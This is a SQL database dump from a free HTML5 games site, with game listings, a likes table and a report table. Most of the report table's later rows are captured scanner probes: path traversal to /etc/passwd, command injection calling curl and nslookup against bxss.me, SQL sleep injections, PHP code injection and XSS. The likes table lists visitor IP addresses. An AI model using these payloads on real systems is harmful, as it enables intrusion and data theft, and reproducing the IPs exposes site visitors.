(885, 'Mercedes Benz GLC63 Puzzle', 'Play with 6 images in this perfect jigsaw puzzle game: Mercedes-Benz GLC63 Puzzle. All images is with the mercedes-benz glc63. Solve all puzzles and keep your brain sharp. You have four modes for each picture, 16 pieces, 36 pieces, 64 pieces and 100 pieces. Enjoy and have fun.', 'https://img.gamedistribution.com/021daa4c895149459cec292a79030e66-512x384.jpeg', 'https://html5.gamedistribution.com/021daa4c895149459cec292a79030e66/', '0', 'Puzzle', 0, 0, '', 0, ''),
(886, 'Penguin Cafe', 'In a snowy land where penguins, polar bears and walruses live side by side, you need to help overworked Berta run her struggling cafe. Happily, the cafe floats on an iceberg, so there’s adventure to be had…', 'https://img.gamedistribution.com/54c098638afa490293cd8905e642784f-512x384.jpeg', 'https://html5.gamedistribution.com/54c098638afa490293cd8905e642784f/', '0', 'Cooking', 0, 0, 'https://img.gamedistribution.com/54c098638afa490293cd8905e642784f-1280x550.jpeg', 0, ''),
(888, 'Word Find Plus', 'Do you like Puzzle Game? Word Find Plus has 15 categories and more than 300 level.\n✜ You must select your categories and start game\n✜ You must draw correct word with your mouse\n✜ If you need clue or hint you can use hint point.\n✜ You have 5 Hint point.', 'https://img.gamedistribution.com/8e81958ce7e84c3db1e0dfba1e150d97-512x384.jpeg', 'https://html5.gamedistribution.com/8e81958ce7e84c3db1e0dfba1e150d97/', '0', 'Puzzle', 0, 0, '', 0, ''),
(889, 'Finger Family Song', 'Finger Family Game app is an educational and entertaining interactive game, which contains Finger Family songs. You can drag and drop the family members on the big hand and Enjoy Finger family game. It is a nice, simple, funny, and colorful game! You can learn finger family song lyrics along with this gameplay.', 'https://img.gamedistribution.com/6183cb6d1d084f1baeaa374d2847bd13-512x384.jpeg', 'https://html5.gamedistribution.com/6183cb6d1d084f1baeaa374d2847bd13/', '0', 'Casual', 0, 0, '', 0, ''),
(890, 'Save Pizza', 'It’s endless type game you need click on cockroach to destroy. Get a bonus olive, but don’t touch her. ', 'https://img.gamedistribution.com/cbad76092cfc488fabc7b048a2b12cae-512x384.jpeg', 'https://html5.gamedistribution.com/cbad76092cfc488fabc7b048a2b12cae/', '0', 'Casual', 0, 0, '', 0, ''),
(891, 'FZ Steam Trucker', 'FZ Steam Trucker – jump behind the wheel of this steampunk big rig and see if you can get its cargo to the end of the track. Can you reach the garage without spilling anything?', 'https://img.gamedistribution.com/fc74ca1f3a214805bea30fe5b4e26784-512x384.jpeg', 'https://html5.gamedistribution.com/fc74ca1f3a214805bea30fe5b4e26784/', '0', 'Adventure', 0, 0, '', 0, ''),
(892, 'Zombie Live', 'zombie life is an arcade game, avoid falling bombs and eat brains to get a high score', 'https://img.gamedistribution.com/8523a10c96854d35b0e5d083c1f3066b-512x384.jpeg', 'https://html5.gamedistribution.com/8523a10c96854d35b0e5d083c1f3066b/', '0', 'Shooter', 0, 0, '', 0, ''),
(893, 'Sushi Slice', 'It’s endless type game, you need click ans move the mouse to slice sushi. Don’t hit the bombs. You will  be immersed in the incredible atmosphere of the Japan tradition. There are 2 types of sushi. Bonus system. Enjoy advance, keep your mind! ', 'https://img.gamedistribution.com/6992b45e0149474cb868b06ac4560e73-512x384.jpeg', 'https://html5.gamedistribution.com/6992b45e0149474cb868b06ac4560e73/', '0', 'Casual', 0, 0, '', 0, ''),
(895, 'Ancient Egypt Match 3', 'Ancient Egypt Match 3 – this is a three in a row game, in which you have to put the blocks of the same ancient egyptian items in a series of three pieces or more to achieve the highest possible score, be careful to account the scale to the left did not fall too low, otherwise the game will be over. The game is done in a ancient egyptian style! Enjoy the game!', 'https://img.gamedistribution.com/4d398f20eee24c83a65fe3db96182799-512x384.jpeg', 'https://html5.gamedistribution.com/4d398f20eee24c83a65fe3db96182799/', '0', 'Match-3', 0, 0, 'https://img.gamedistribution.com/4d398f20eee24c83a65fe3db96182799-1280x550.jpeg', 0, ''),
(898, 'Jelly Friend', 'Jelly Friend is a matching game, draw lines and match as much jelly as possible to unlock levels', 'https://img.gamedistribution.com/012276782a6f422d9463c787b6a43094-512x384.jpeg', 'https://html5.gamedistribution.com/012276782a6f422d9463c787b6a43094/', '0', 'Casual', 0, 0, '', 0, ''),
(899, 'Car Parking Simulator  Classic Car Park', 'Real Classic Car Parking 3d new Hard Drive is full of fun and enjoyment. This car parking games will develop your driving skills but not car racing skills. Brace yourself to fun with the newest, unique car parking game of 2019. Classic Car Parking 3D simulator This parking mania game will teach you various parking skills', 'https://img.gamedistribution.com/dbf702d80eff4751b2f3a7c4f5e1fe73-512x512.jpeg', 'https://html5.gamedistribution.com/dbf702d80eff4751b2f3a7c4f5e1fe73/', '0', 'Simulation', 0, 0, 'https://img.gamedistribution.com/dbf702d80eff4751b2f3a7c4f5e1fe73-1280x720.jpeg', 0, ''),
(900, '360 Smash', 'A game of reaction speed and wit. Smash or dodge the ball to try to confuse your competitors off the field!', 'https://img.gamedistribution.com/4290deae2e6245778ac0443c106c5744-512x384.jpeg', 'https://html5.gamedistribution.com/4290deae2e6245778ac0443c106c5744/', '0', 'Sports', 0, 0, 'https://img.gamedistribution.com/4290deae2e6245778ac0443c106c5744-1280x550.jpeg', 0, ''),
(904, 'Chaos In The City', 'Control different monsters and destroy the small town, earn points and coins for the unlock monsters. Be careful of the police and the army trying to stop you.', 'https://img.gamedistribution.com/e691691ddb5842e2b8cda377834cb592-512x384.jpeg', 'https://html5.gamedistribution.com/e691691ddb5842e2b8cda377834cb592/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/e691691ddb5842e2b8cda377834cb592-1280x550.jpeg', 0, ''),
(906, 'Halloween Slide Puzzle 2', 'Play this slide puzzle games of halloween. It\'s include 3 images and 3 modes to play.                                                         ', 'https://img.gamedistribution.com/e4229145f1a3455c8c28800089fa1040-512x384.jpeg', 'https://html5.gamedistribution.com/e4229145f1a3455c8c28800089fa1040/', '0', 'Puzzle', 0, 0, '', 0, ''),
(907, 'Super 3D World Adventure', 'Do you like Adventure game? Great, Super 3D World Adventure is waiting for you.', 'https://img.gamedistribution.com/67899797ffc24fb180bd01a4211d6e44-512x384.jpeg', 'https://html5.gamedistribution.com/67899797ffc24fb180bd01a4211d6e44/', '0', 'Adventure', 0, 0, '', 0, ''),
(909, 'Toilet Rush', 'Toilet rush is a puzzle platformer game. Find your way and dump your load on the lavatory before you explode. It\'s a everyday struggle to find peace on toilet.', 'https://img.gamedistribution.com/b918270320db4f1fb4017cbf44a34db4-512x384.jpeg', 'https://html5.gamedistribution.com/b918270320db4f1fb4017cbf44a34db4/', '0', 'Puzzle', 0, 0, '', 0, ''),
(911, 'Sunset Driver', 'Don’t hit the cars who  go to meet. Bonus system. Collect diamonds to buy skins. You will  be immersed in the incredible atmosphere of the race. There are 6 types of enemies cars. Game has a shop, available six skins for cars: standard, sunset, neon, zombie, unicorn, fire.Enjoy advance, keep your mind! \nHow to play:\nClick on mouse or use arrow keys to move the car.', 'https://img.gamedistribution.com/f54dcce859d646fcb8fd6158f5f6fb15-512x384.jpeg', 'https://html5.gamedistribution.com/f54dcce859d646fcb8fd6158f5f6fb15/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(913, 'Kong Hero', 'Help Kong Hero collect as many coins as possible but watch out for all the dangers. Try and collect as much fruit as you can along the way', 'https://img.gamedistribution.com/83f8aa7b434240b6a75c34dda1b099d8-512x340.jpeg', 'https://html5.gamedistribution.com/83f8aa7b434240b6a75c34dda1b099d8/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/83f8aa7b434240b6a75c34dda1b099d8-1280x720.jpeg', 0, 'md'),
(915, 'Cartoon Ship Puzzle', 'Cartoon Ship Puzzle is free online puzzle game suitable for all ages. Kids will love this game. There is a lot of ship images, pick one and try to solve the puzzle and have fun. No time limit, just take your time and enjoy.', 'https://img.gamedistribution.com/f9f35490aed648d296ec70e6539ed9f6-512x384.jpeg', 'https://html5.gamedistribution.com/f9f35490aed648d296ec70e6539ed9f6/', '0', 'Puzzle', 0, 0, '', 0, ''),
(916, 'Halloween Slide Puzzle', 'Play this slide puzzle games of halloween. It\'s include 3 images and 3 modes to play. Enjoy it and happy fun.                     ', 'https://img.gamedistribution.com/424792ca90f34da48acd67ffa07ddc84-512x384.jpeg', 'https://html5.gamedistribution.com/424792ca90f34da48acd67ffa07ddc84/', '0', 'Puzzle', 0, 0, '', 0, '');

-- --------------------------------------------------------

--
-- Structure de la table `zon_likes`
--

CREATE TABLE `zon_likes` (
  `id` int(11) NOT NULL,
  `user_ip` text NOT NULL,
  `game_id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Déchargement des données de la table `zon_likes`
--

INSERT INTO `zon_likes` (`id`, `user_ip`, `game_id`) VALUES
(32, '123', 90),
(34, '::1', 90),
(42, '::1', 30),
(44, '::1', 23),
(48, '::1', 99),
(56, '106.220.63.53', 185),
(58, '117.99.233.185', 1),
(59, '223.176.58.35', 164),
(60, '90.190.166.20', 134),
(64, '103.98.129.82', 109),
(65, '113.172.158.182', 23526),
(66, '171.51.148.227', 23411),
(67, '84.54.135.85', 23515),
(68, '65.95.210.64', 23528),
(69, '65.95.210.64', 115),
(72, '157.35.53.86', 23526),
(73, '117.97.165.43', 23375),
(74, '31.155.19.95', 34),
(75, '223.233.80.173', 23526),
(76, '196.74.125.29', 23496),
(77, '103.98.129.94', 23526),
(78, '39.37.54.189', 23478),
(84, '105.67.132.230', 23349),
(86, '85.102.240.62', 52),
(87, '152.58.232.130', 23528),
(88, '152.58.232.130', 60),
(89, '152.58.232.130', 23411),
(92, '95.24.108.11', 23508),
(93, '138.199.53.250', 21),
(96, '117.198.14.146', 23489),
(98, '90.191.73.149', 23492),
(99, '5.176.98.83', 106),
(100, '223.123.18.120', 23331),
(101, '88.237.220.180', 23468),
(102, '95.70.233.181', 45),
(103, '103.230.107.39', 23445),
(104, '191.36.227.199', 23528),
(105, '49.47.154.85', 23526),
(106, '94.239.196.129', 71),
(108, '157.35.75.117', 23526),
(109, '122.163.227.166', 23406),
(110, '178.233.152.177', 12),
(112, '178.233.152.177', 23506),
(118, '178.233.152.177', 23515),
(119, '178.233.152.177', 23517),
(178, '159.146.38.157', 0),
(180, '188.119.27.83', 19732),
(181, '188.119.27.83', 23374),
(183, '46.1.14.166', 23524),
(184, '104.172.45.71', 23503),
(186, '87.122.26.176', 112),
(187, '87.122.26.176', 23514),
(188, '84.24.147.143', 23507),
(190, '103.172.132.109', 23494),
(191, '95.70.175.237', 23521),
(193, '59.95.82.122', 79),
(194, '196.77.21.149', 15),
(195, '196.77.21.149', 23528),
(197, '103.98.129.84', 23332),
(198, '149.62.204.248', 23528),
(199, '152.59.87.75', 23330),
(200, '89.245.182.125', 84),
(201, '163.53.179.49', 23491),
(202, '27.57.70.69', 23520),
(203, '92.184.107.167', 15),
(205, '46.1.238.104', 23526),
(206, '46.1.238.104', 66),
(208, '95.70.175.33', 23526),
(209, '90.190.166.20', 18),
(210, '138.204.135.112', 23501),
(211, '212.154.66.131', 23519),
(212, '2.223.182.204', 65),
(213, '95.70.146.162', 23521),
(214, '69.63.164.106', 1),
(215, '176.28.251.95', 377),
(216, '176.29.163.181', 354),
(219, '45.20.147.158', 4),
(221, '69.63.164.105', 371);

-- --------------------------------------------------------

--
-- Structure de la table `zon_pages`
--

CREATE TABLE `zon_pages` (
  `id` int(11) NOT NULL,
  `title` text NOT NULL,
  `desc` text NOT NULL,
  `content` longtext NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Déchargement des données de la table `zon_pages`
--

INSERT INTO `zon_pages` (`id`, `title`, `desc`, `content`) VALUES
(1, 'About', 'Welcome to Me Games ! We', '<p>&lt;p&gt;&lt;strong&gt;Me Games&lt;/strong&gt; offers one of the best collections of free online HTML5 games. From crazy action games to relaxing puzzles, you’ll find something fun to play — solo or with friends!&lt;/p&gt;</p><p>&lt;p&gt;All our games are available instantly with no downloads, no login, and no popups. Just click and play! Whether you’re on desktop, tablet, or mobile, &lt;strong&gt;Me Games&lt;/strong&gt; lets you enjoy smooth, distraction-free gameplay anytime, anywhere.&lt;/p&gt;</p><p>&lt;p&gt;Each month, over &lt;strong&gt;60 million players&lt;/strong&gt; from around the world enjoy their favorite games on Me Games. Join them today and discover why we’re one of the top free gaming platforms online!&lt;/p&gt;<br>&nbsp;</p>');

-- --------------------------------------------------------

--
-- Structure de la table `zon_report`
--

CREATE TABLE `zon_report` (
  `id` int(11) NOT NULL,
  `game_name` text NOT NULL,
  `report_subject` text NOT NULL,
  `game_id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Déchargement des données de la table `zon_report`
--

INSERT INTO `zon_report` (`id`, `game_name`, `report_subject`, `game_id`) VALUES
(39, 'Barbies Sketch', 'e', 14),
(46, '!(()&&!|*|*|', 'e', 14),
(47, '', 'e', 14),
(48, '^(#$!@#$)(()))******', 'e', 14),
(49, 'Barbies Sketch', 'e', 14),
(50, 'Barbies Sketch', 'e&lt;esi:include src=&quot;http://bxss.me/rpb.png&quot;/&gt;', 14),
(51, 'Barbies Sketch', 'e', 0),
(52, 'Barbies Sketch', 'e', 14),
(53, 'Barbies Sketch', 'e', 14),
(54, 'Barbies Sketch', ')', 14),
(55, '../../../../../../../../../../../../../../etc/passwd', 'e', 14),
(56, 'Barbies Sketch', 'e', 14),
(57, 'Barbies Sketch', 'e', 0),
(58, 'Barbies Sketch', 'e', 14),
(59, '../../../../../../../../../../../../../../windows/win.ini', 'e', 14),
(60, 'Barbies Sketch', '!(()&amp;&amp;!|*|*|', 14),
(61, '${9999652+9999710}', 'e', 14),
(62, 'Barbies Sketch', 'e', 14),
(63, 'Barbies Sketch', '^(#$!@#$)(()))******', 14),
(64, 'Barbies Sketch', 'e', 0),
(65, 'Barbies Sketch', '12345&#039;&quot;\\&#039;\\&quot;);|]*\0{\r\n&lt;\0&gt;ï¿½&#039;&#039;ðŸ’¡', 14),
(66, 'Barbies Sketch', 'e', 14),
(67, 'Barbies Sketch\"&&sleep(27*1000)*wdxwca&&\"', 'e', 14),
(68, 'file:///etc/passwd', 'e', 14),
(69, 'Barbies Sketch', '${9999231+9999608}', 14),
(70, 'Barbies Sketch', 'e', 14),
(71, '../Barbies Sketch', 'e', 14),
(72, 'Barbies Sketch', 'e', 14),
(73, 'Barbies Sketch\"||sleep(27*1000)*ggdftu||\"', 'e', 14),
(74, '\";print(md5(31337));$a=\"', 'e', 14),
(75, 'Barbies Sketch', '../../../../../../../../../../../../../../etc/passwd', 14),
(76, '${@print(md5(31337))}', 'e', 14),
(77, 'Barbies Sketch', 'e', 0),
(78, 'Barbies Sketch', '../../../../../../../../../../../../../../windows/win.ini', 14),
(79, 'Barbies Sketch', 'e', 14),
(80, 'Barbies Sketch', '&#039;&quot;()', 14),
(81, 'Barbies Sketch', 'e', 14),
(82, 'Barbies Sketch', 'file:///etc/passwd', 14),
(83, 'Barbies Sketch', 'e&#039;&amp;&amp;sleep(27*1000)*zhzjxa&amp;&amp;&#039;', 14),
(84, 'Barbies Sketch', 'e', 0),
(85, 'Barbies Sketch', 'e', 14),
(86, 'Barbies Sketch', 'e', 14),
(87, 'Barbies Sketch', 'e&quot;&amp;&amp;sleep(27*1000)*wdqsmj&amp;&amp;&quot;', 14),
(88, 'Barbies Sketch', 'e', 14),
(89, 'Barbies Sketch', '../e', 14),
(90, 'Barbies Sketch', 'e&#039;||sleep(27*1000)*jlzauh||&#039;', 14),
(91, 'Barbies Sketch', 'e', 14),
(92, 'response.write(9170801*9264431)', 'e', 14),
(93, 'Barbies Sketch', ';assert(base64_decode(&#039;cHJpbnQobWQ1KDMxMzM3KSk7&#039;));', 14),
(94, 'HttP://bxss.me/t/xss.html?%00', 'e', 14),
(95, 'Barbies Sketch', 'e&quot;||sleep(27*1000)*wtuwaz||&quot;', 14),
(96, 'Barbies Sketch', '&#039;;print(md5(31337));$a=&#039;', 14),
(97, 'Barbies Sketch', 'e', 14),
(98, 'bxss.me/t/xss.html?%00', 'e', 14),
(99, 'Barbies Sketch', 'HttP://bxss.me/t/xss.html?%00', 14),
(100, 'http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg', 'e', 14),
(101, 'report.php', 'e', 14),
(102, 'Barbies Sketch', 'e', 931630),
(103, '\"+response.write(9170801*9264431)+\"', 'e', 14),
(104, '1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs\0.jpg', 'e', 14),
(105, '\"+\"A\".concat(70-3).concat(22*4).concat(120).concat(85).concat(115).concat(67)+(require\"socket\"\nSocket.gethostbyname(\"hitxl\"+\"dnxcopdzf8172.bxss.me.\")[3].to_s)+\"', 'e', 14),
(106, 'Barbies Sketch', 'bxss.me/t/xss.html?%00', 14),
(107, 'Barbies Sketch', '&quot;;print(md5(31337));$a=&quot;', 14),
(108, 'report.php\0', 'e', 14),
(109, ')))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))', 'e', 14),
(110, 'Barbies Sketch', 'response.write(9674608*9521966)', 14),
(111, 'Http://bxss.me/t/fit.txt', 'e', 14),
(112, 'Barbies Sketch', '${@print(md5(31337))}', 14),
(113, 'Barbies Sketch', 'e', 14),
(114, 'report.php/.', 'e', 14),
(115, 'Barbies Sketch', ')))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))', 14),
(116, 'Barbies Sketch', '${@print(md5(31337))}\\', 14),
(117, 'http://bxss.me/t/fit.txt?.jpg', 'e', 14),
(118, 'Barbies Sketch', 'report.php', 14),
(119, 'Barbies Sketch', '&#039;+response.write(9674608*9521966)+&#039;', 14),
(120, 'Barbies Sketch', 'e', 14),
(121, 'Barbies Sketch', '&quot;+&quot;A&quot;.concat(70-3).concat(22*4).concat(98).concat(70).concat(98).concat(74)+(require&quot;socket&quot;\nSocket.gethostbyname(&quot;hitzb&quot;+&quot;wloluhxs44124.bxss.me.&quot;)[3].to_s)+&quot;', 14),
(122, '/etc/shells', 'e', 14),
(123, 'Barbies Sketch', 'report.php\0', 14),
(124, 'Barbies Sketch', '&#039;+&#039;A&#039;.concat(70-3).concat(22*4).concat(111).concat(70).concat(107).concat(84)+(require&#039;socket&#039;\nSocket.gethostbyname(&#039;hitry&#039;+&#039;idcszwit4a108.bxss.me.&#039;)[3].to_s)+&#039;', 14),
(125, 'c:/windows/win.ini', 'e', 14),
(126, 'Barbies Sketch', '&quot;+response.write(9674608*9521966)+&quot;', 14),
(127, 'Barbies Sketch', '&#039;.print(md5(31337)).&#039;', 14),
(128, 'Barbies Sketch', 'e', 149453544),
(129, 'Barbies Sketch', 'report.php/.', 14),
(130, 'Barbies Sketch', 'http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg', 14),
(131, 'Barbies Sketch9189015', 'e', 14),
(132, 'Barbies Sketch', '1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs\0.jpg', 14),
(133, 'xfs.bxss.me', 'e', 14),
(134, 'Barbies Sketch', 'http://bxss.me/t/fit.txt?.jpg', 14),
(135, 'Barbies Sketch', 'Http://bxss.me/t/fit.txt', 14),
(136, 'Barbies Sketch', '&#039;&quot;', 14),
(137, '(nslookup -q=cname hitakjcudfwcl9a78f.bxss.me||curl hitakjcudfwcl9a78f.bxss.me))', 'e', 14),
(138, 'Barbies Sketch', '&lt;!--', 14),
(139, 'Barbies Sketch', 'xfs.bxss.me', 14),
(140, 'Barbies Sketch', 'e&#039;&quot;()&amp;%&lt;zzz&gt;&lt;ScRiPt &gt;TI9d(9890)&lt;/ScRiPt&gt;', 14),
(141, 'Barbies Sketch', 'e&#039;&quot;()&amp;%&lt;zzz&gt;&lt;ScRiPt &gt;TI9d(9890)&lt;/ScRiPt&gt;', 14),
(142, '$(nslookup -q=cname hitrqocbqpusl86687.bxss.me||curl hitrqocbqpusl86687.bxss.me)', 'e', 14),
(143, '|(nslookup -q=cname hitjhjiittmfrdb012.bxss.me||curl hitjhjiittmfrdb012.bxss.me)', 'e', 14),
(144, 'Barbies Sketch', 'e', 14),
(145, '`(nslookup -q=cname hitvxzypmxfpre5b77.bxss.me||curl hitvxzypmxfpre5b77.bxss.me)`', 'e', 14),
(146, ';(nslookup -q=cname hituzbqikrzdlfc7d3.bxss.me||curl hituzbqikrzdlfc7d3.bxss.me)|(nslookup -q=cname hituzbqikrzdlfc7d3.bxss.me||curl hituzbqikrzdlfc7d3.bxss.me)&(nslookup -q=cname hituzbqikrzdlfc7d3.bxss.me||curl hituzbqikrzdlfc7d3.bxss.me)', 'e', 14),
(147, 'Barbies Sketch', 'bxss.me', 14),
(148, 'Barbies Sketch', 'e9265599', 14),
(149, 'Barbies Sketch', '&amp;echo lswiad$()\\ zjgpsd\\nz^xyu||a #&#039; &amp;echo lswiad$()\\ zjgpsd\\nz^xyu||a #|&quot; &amp;echo lswiad$()\\ zjgpsd\\nz^xyu||a #', 14),
(150, 'Barbies Sketch', '|echo gnioiq$()\\ ajqrvy\\nz^xyu||a #&#039; |echo gnioiq$()\\ ajqrvy\\nz^xyu||a #|&quot; |echo gnioiq$()\\ ajqrvy\\nz^xyu||a #', 14),
(151, 'Barbies Sketch', 'e|echo lizvzr$()\\ hxnnup\\nz^xyu||a #&#039; |echo lizvzr$()\\ hxnnup\\nz^xyu||a #|&quot; |echo lizvzr$()\\ hxnnup\\nz^xyu||a #', 14),
(152, 'Barbies Sketch', '(nslookup -q=cname hitrakunjmrzk314c2.bxss.me||curl hitrakunjmrzk314c2.bxss.me))', 14),
(153, 'Barbies Sketch', '$(nslookup -q=cname hitsiececbymade193.bxss.me||curl hitsiececbymade193.bxss.me)', 14),
(154, 'Barbies Sketch', '&amp;(nslookup -q=cname hitoyfetxesod04fd8.bxss.me||curl hitoyfetxesod04fd8.bxss.me)&amp;&#039;\\&quot;`0&amp;(nslookup -q=cname hitoyfetxesod04fd8.bxss.me||curl hitoyfetxesod04fd8.bxss.me)&amp;`&#039;', 14),
(155, 'Barbies Sketch', '|(nslookup -q=cname hituiddvpotyq5cb04.bxss.me||curl hituiddvpotyq5cb04.bxss.me)', 14),
(156, 'Barbies Sketch', 'e', 14),
(157, 'Barbies Sketch', '`(nslookup -q=cname hitqjgwsiqeng8f693.bxss.me||curl hitqjgwsiqeng8f693.bxss.me)`', 14),
(158, 'Barbies Sketch', ';(nslookup -q=cname hitcmafbrsmxv0995d.bxss.me||curl hitcmafbrsmxv0995d.bxss.me)|(nslookup -q=cname hitcmafbrsmxv0995d.bxss.me||curl hitcmafbrsmxv0995d.bxss.me)&amp;(nslookup -q=cname hitcmafbrsmxv0995d.bxss.me||curl hitcmafbrsmxv0995d.bxss.me)', 14),
(159, 'Barbies Sketch', 'e', 14),
(160, 'Barbies Sketch', 'e', 14),
(161, 'Barbies Sketch', 'e', 14),
(162, 'Barbies Sketch', 'e', 14),
(163, 'Barbies Sketch', 'e', 14),
(164, 'Barbies Sketch', 'e', 14),
(165, 'Barbies Sketch', 'e', 14),
(166, 'Barbies Sketch', 'e', 14),
(167, 'Barbies Sketch', 'e', 14),
(168, 'Barbies Sketch', 'e', 14),
(169, 'Barbies Sketch', 'e', 14),
(170, 'Barbies Sketch', 'e', 14),
(171, 'Barbies Sketch', 'e', 14),
(172, 'Barbies Sketch', 'e', 1),
(173, 'Barbies Sketch', 'e', 14),
(174, 'Barbies Sketch', 'e', 14),
(175, 'Barbies Sketch5cDsdjax', 'e', 14),
(176, 'Barbies Sketch', 'e', 14),
(177, '-1 OR 2+344-344-1=0+0+0+1 -- ', 'e', 14),
(178, '-1 OR 2+245-245-1=0+0+0+1', 'e', 14),
(179, '1', 'e', 14),
(180, '-1\" OR 2+506-506-1=0+0+0+1 -- ', 'e', 14),
(181, '-1\" OR 3+506-506-1=0+0+0+1 -- ', 'e', 14),
(182, '-1\" OR 3*2<(0+5+506-506) -- ', 'e', 14),
(183, '-1\" OR 3*2>(0+5+506-506) -- ', 'e', 14),
(184, '-1\" OR 3*2>(0+5+506-506) -- ', 'e', 14),
(185, 'Barbies SketchÀ§À¢%2527%2522\'\"', 'e', 14),
(186, '@@VlVKO', 'e', 14),
(187, 'Barbies Sketch', 'e', 14),
(188, 'Barbies Sketch', 'e', 14),
(189, 'Barbies Sketch', 'evvJKrD9r', 14),
(190, 'Barbies Sketch', 'e', 14),
(191, 'Barbies Sketch', 'e', 14),
(192, 'Barbies Sketch', '-1 OR 2+910-910-1=0+0+0+1 -- ', 14),
(193, 'Barbies Sketch', '-1 OR 2+444-444-1=0+0+0+1', 14),
(194, 'Barbies Sketch', '-1&#039; OR 2+147-147-1=0+0+0+1 -- ', 14),
(195, 'Barbies Sketch', '-1&#039; OR 2+286-286-1=0+0+0+1 or &#039;umtcRr2r&#039;=&#039;', 14),
(196, 'Barbies Sketch', '-1&quot; OR 2+511-511-1=0+0+0+1 -- ', 14),
(197, 'Barbies Sketch', 'if(now()=sysdate(),sleep(15),0)', 14),
(198, 'Barbies Sketch', 'e0&#039;XOR(if(now()=sysdate(),sleep(15),0))XOR&#039;Z', 14),
(199, 'Barbies Sketch', 'e0&quot;XOR(if(now()=sysdate(),sleep(15),0))XOR&quot;Z', 14),
(200, 'Barbies Sketch', '(select(0)from(select(sleep(15)))v)/*&#039;+(select(0)from(select(sleep(15)))v)+&#039;&quot;+(select(0)from(select(sleep(15)))v)+&quot;*/', 14),
(201, 'Barbies Sketch', 'e-1 waitfor delay &#039;0:0:15&#039; -- ', 14),
(202, 'Barbies Sketch', 'eYgFh1no4&#039;; waitfor delay &#039;0:0:15&#039; -- ', 14),
(203, 'Barbies Sketch', 'eZOMmCRTW&#039; OR 694=(SELECT 694 FROM PG_SLEEP(15))--', 14),
(204, 'Barbies Sketch', 'eBF91Wjq1&#039; OR 858=(SELECT 858 FROM PG_SLEEP(6))--', 14),
(205, 'Barbies Sketch', 'e', 1),
(206, 'Barbies Sketch', 'e', 1),
(207, 'Barbies Sketch', 'e', 1),
(208, 'Barbies Sketch', 'e', 9825),
(209, 'Barbies Sketch', 'e', 0),
(210, 'Barbies Sketch', 'e', 1),
(211, 'Barbies Sketch', 'e', 1),
(212, 'Barbies Sketch', 'e', 0),
(213, 'Barbies Sketch', 'e', 1),
(214, 'Barbies Sketch', 'e', 1),
(215, 'Barbies Sketch', 'e', 1),
(216, 'Barbies Sketch', 'e', 0),
(217, 'Barbies Sketch', 'e', 1),
(218, 'Barbies Sketch', 'e', 1),
(219, 'Barbies Sketch', 'e', 1),
(220, 'Barbies Sketch', 'e', 1),
(221, 'Barbies Sketch', 'e', 1),
(222, 'Barbies Sketch', 'e', 0),
(223, 'Barbies Sketch', 'e', 1),
(224, 'Barbies Sketch', 'e', 0),
(225, 'Barbies Sketch', 'e', 0),
(226, 'Barbies Sketch', 'e', 0),
(227, 'Barbies Sketch', 'e', 3708),
(228, 'Barbies Sketch', 'e', 0),
(229, 'Barbies Sketch', 'e', 1),
(230, 'Barbies Sketch', 'e', 1),
(231, 'Barbies Sketch', 'e', 0),
(232, 'Barbies Sketch', 'e', 0),
(233, 'Barbies Sketch', 'e', 1),
(234, 'Barbies Sketch', 'e', 1),
(235, 'Barbies Sketch', 'e', 1),
(236, 'Barbies Sketch', 'e', 1),
(237, 'Barbies Sketch', 'e', 1),
(238, 'Barbies Sketch', 'e', 2147483647),
(239, 'Barbies Sketch', 'e', 1),
(240, 'Barbies Sketch', 'e', 1),
(241, 'Barbies Sketch', 'e', 1),
(242, 'Barbies Sketch', 'e', 3551),
(243, 'Barbies Sketch', 'e', 9950),
(244, 'Barbies Sketch', 'e', 0),
(245, 'Barbies Sketch', 'e', 1),
(246, 'Barbies Sketch', 'e', 1),
(247, 'Barbies Sketch', 'e', 0),
(248, 'Barbies Sketch', 'e', 1),
(249, 'Barbies Sketch', 'e', 1),
(250, 'Barbies Sketch', 'e', 1),
(251, 'Barbies Sketch', 'e', 1),
(252, 'Barbies Sketch', 'e', 1),
(253, 'Barbies Sketch', 'e', 1),
(254, 'Barbies Sketch', 'e', 1),
(255, 'Barbies Sketch', 'e', 1),
(256, 'Barbies Sketch', 'e', 1),
(257, 'Barbies Sketch', 'e', 1),
(258, 'Barbies Sketch', 'e', 1),
(259, 'Barbies Sketch', 'e', 1),
(260, 'Barbies Sketch', 'e', 1),
(261, 'Barbies Sketch', 'e', 1),
(262, 'Barbies Sketch', 'e', 1),
(263, 'Barbies Sketch', 'e', 1),
(264, 'Barbies Sketch', 'e', 1),
(265, 'Barbies Sketch', 'e', 1),
(266, 'Barbies Sketch', 'e', 4865),
(267, 'Barbies Sketch', 'e', 0),
(268, 'Barbies Sketch', 'e', 1),
(269, 'Barbies Sketch', 'e', 1),
(270, 'Barbies Sketch', 'e', 1),
(271, 'Barbies Sketch', 'e', 1930),
(272, 'Barbies Sketch', 'e', 0),
(273, 'Barbies Sketch', 'e', 1),
(274, 'Barbies Sketch', 'e', 1),
(275, 'Barbies Sketch', 'e', 0),
(276, 'Barbies Sketch', 'e', 1),
(277, 'Barbies Sketch', 'e', 1),
(278, 'Barbies Sketch', 'e', 1),
(279, 'Barbies Sketch', 'e', 1),
(280, 'Barbies Sketch', 'e', 1),
(281, 'Barbies Sketch', 'e', 1),
(282, 'Barbies Sketch', 'e', 1),
(283, 'Barbies Sketch', 'e', 1),
(284, 'Barbies Sketch', 'e', 1),
(285, 'Barbies Sketch', 'e', 1),
(286, 'Barbies Sketch', 'e', 1),
(287, 'Barbies Sketch', 'e', 1),
(288, 'Barbies Sketch', 'e', 1),
(289, 'Barbies Sketch', 'e', 1),
(290, 'Barbies Sketch', 'e', 1),
